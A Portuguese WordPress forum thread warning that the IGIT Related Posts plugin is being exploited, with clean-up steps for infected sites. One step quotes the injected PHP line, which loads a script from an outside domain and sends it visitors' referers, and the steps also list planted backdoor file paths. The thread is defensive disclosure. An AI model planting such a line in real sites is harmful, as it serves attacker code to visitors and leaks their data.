← WordPress

[Atenção] Falha de segurança no plugin IGIT Related Posts

Lida 2229 vezes

Offline

Carlos Gandra 
Administrador
Mensagens 3082 Gostos 97
Feedback +1

Troféus totais: 34
Trófeus: (Ver todos)
Level 6 Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4

O IGIT Related Posts tem o mesmo problema que tinha o timthumb. Acabei de ver isso porque um site meu foi atacado através dele.

Mais info:
http://wordpress.org/support/topic/attention-igit-related-posts-with-thumb-image-after-posts-phpremoteview-attack

Creio que ainda não existe actualização por isso o melhor é desactivar e remover o plugin. Caso já tenha ocorrido o ataque é também necessário proceder à desinfecção (cópia de segurança primeiro):

Eliminar o seguinte código do index.php
Código: [Seleccione]
echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

Eliminar os seguintes ficheiros:
/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/upd.php
/wp-content/upd.php

Offline

Jóni Oliveira 
Administrador
Mensagens 3428 Gostos 386
Feedback +28

Troféus totais: 33
Trófeus: (Ver todos)
Mobile User Apple User Level 6 Windows User Super Combination Combination Topic Starter 10 Poll Votes Poll Voter Level 5

Obrigado, uso isso em quase todo o lado.
Offline

Carlos Gandra 
Administrador
Mensagens 3082 Gostos 97
Feedback +1

Troféus totais: 34
Trófeus: (Ver todos)
Level 6 Super Combination Combination Topic Starter 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter Level 5 Level 4

Vou fazer num instante um post no blog sobre isto, é uma infecção que pode passar despercebida seja pelo igit ou pelo timthumb...

Edit: done
http://www.maistrafego.pt/wordpress-vulnerabilidade-timthumb-igit-related-posts

Edit2: post actualizado, também encontrei o ficheiro em
/wp-content/upd.php